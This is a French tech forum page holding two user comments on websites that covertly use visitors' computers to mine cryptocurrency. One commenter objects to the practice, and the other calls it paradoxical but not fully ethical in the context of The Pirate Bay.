    Cloudflare pourrait bloquer les sites utilisant du code pour transformer les utilisateurs en mineurs de cryptomonnaies, ProxyBunker aurait été bloqué
    Adblock Plus déploie un filtre pour protéger les ressources de votre ordinateur du minage de monnaie électronique
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  19. #19
    Membre régulier
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    janvier 2011
    Messages
    51
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 64
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : janvier 2011
    Messages : 51
    Points : 94
    Points
    94

    Par défaut

    Je trouve ces méthodes trop invasives et sans que j'en soit avisé, c'est inadmissible.

    Pour ce qui est des pubs, il est vrai que ce sont toujours les mêmes qui passent : Amazon, Ebay, les marketplaces en tout genre.
    Je n'ai pas encore mis de bloqueurs sur mon navigateur, mais j'ai de plus en plus envie de le faire.

  20. #20
    Nouveau membre du Club
    Homme Profil pro
    Développeur Web
    Inscrit en
    septembre 2015
    Messages
    77
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Val d'Oise (Île de France)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : septembre 2015
    Messages : 77
    Points : 37
    Points
    37

    Par défaut The pirate bay..

    Mouai.

    Je te trouve ca assez paradoxal que des utilisateurs de The Pirate Bay se plaignent du vol de leur ressources quand dans 90% des cas c'est exactement ce qu'ils font de leur côté !

    Apres, je suis comme tout le monde, j'ai déjà testé. Et il faut dire que l'expérience utilisateur est complêtement ruiné par les publicités en tout genre, un vrai défi parfois d'avoir son fichier final, et ce, même avec adblock.

    En partant du principe que l'on y reste pas non plus des heures, je trouve que ce model peux-etre intéressant, bien que pas tout à fait ethique, rappelons quand même que la base du site n'est déjà pas éthique.

Discussions similaires

  1. Dans quels langages de programmation seriez-vous prêt à vous investir en 2017 ?
    Par Siguillaume dans le forum Langages de programmation
    Réponses: 63
    Dernier message: 21/09/2017, 11h56
  2. Seriez-vous prêt à travailler presque gratos ?
    Par mister3957 dans le forum Emploi
    Réponses: 14
    Dernier message: 24/08/2013, 18h50
  3. Réponses: 2
    Dernier message: 16/07/2012, 22h28
  4. [Java] Seriez-vous intéressé par un Guide à la Certification Java ?
    Par christopheJ dans le forum Certifications
    Réponses: 121
    Dernier message: 07/09/2011, 18h39
  5. Réponses: 6
    Dernier message: 14/01/2010, 14h46

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo